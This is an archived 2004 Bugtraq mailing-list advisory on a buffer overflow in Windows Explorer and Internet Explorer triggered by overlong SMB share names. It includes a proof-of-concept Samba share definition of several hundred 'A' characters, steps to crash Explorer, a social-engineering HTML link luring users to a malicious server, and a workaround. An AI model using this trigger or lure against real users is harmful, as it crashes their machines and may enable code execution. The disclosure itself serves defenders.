[34678] in bugtraq
Microsoft's Explorer and Internet Explorer long share name buffer overflow.
daemon@ATHENA.MIT.EDU (Rodrigo Gutierrez)
Mon Apr 26 21:04:39 2004
From: "Rodrigo Gutierrez" <rodrigo@intellicomp.cl>
To: <full-disclosure@lists.netsys.com>, <bugtraq@securityfocus.com>,
<submissions@packetstormsecurity.org>, <info@securiteam.com>
Date: Sun, 25 Apr 2004 18:01:53 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0008_01C42AEF.63F557B0"
Message-Id: <20040425215552.8A1D0403F@etrn.gtdinternet.com>
------=_NextPart_000_0008_01C42AEF.63F557B0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
Fixed Advisory.
Rodrigo Gutierrez.
------=_NextPart_000_0008_01C42AEF.63F557B0
Content-Type: text/plain;
name="explorer-vuln.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="explorer-vuln.txt"
Microsoft Explorer and Internet Explorer Long Share Name Buffer =
Overflow.
Author: Rodrigo Gutierrez <rodrigo@intellicomp.cl>
Affected: MS Internet Explorer, MS Explorer (explorer.exe)=20
Windows XP(All), Windows 2000(All), Windows 98(All), Windows =
me(All)
Not Tested: Windows 2003
Vendor Status: i notified the vendor in the beginning of 2002, this
vulnerability was supposed to be fixed in xp service
pack 1 in XP and SP4 in Windows 2000 according to the=20
vendors knowledge base article 322857.
Vendor url: =
http://support.microsoft.com/default.aspx?scid=3Dkb;en-us;322857
Background.
MS Explorer (explorer.exe) and MS Internet Explorer(IEXPLORE.EXE) are=20
core pieces of Microsoft Windows Operating Systems.
Description
Windows fails to handle long share names when accessing a remote=20
file server such as samba, allowing a malicious server to crash the=20
clients explorer and eventually get to execute arbitrary code in the=20
machine as the current user (usually with Administrator rights in =
windows
machines).
Analysis
In order to exploit this, an attacker must be able to get a user to =
connect=20
to a malicious server which contains a share name equal or longer than =
300
characters.=20
Test Scenario
windows wont allow you to create such a long share, but of course samba=20
includes the feature ;). After your samba box is up and running create =
a=20
share in you smb.conf :
#------------ CUT HERE -------------
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
comment =3D Area 51
path =3D /tmp/testfolder
public =3D yes
writable =3D yes
printable =3D no
browseable =3D yes
write list =3D @trymywingchung
#------------ CUT HERE -------------
After your server is up, just get to your windows test box and get to =
the
start menu > run > \\your.malicious.server.ip., plufff, explorer will =
crash
:).
Social Engineering:
<a href=3D"\\my.malicious.server.ip">Enter My 0day sploit archive =
l/p:n0ph33r</a>
=20
Workaround.
From your network card settings disable the client for Microsoft =
networks=20
until a real fix for this vulnerability is available.
------=_NextPart_000_0008_01C42AEF.63F557B0--
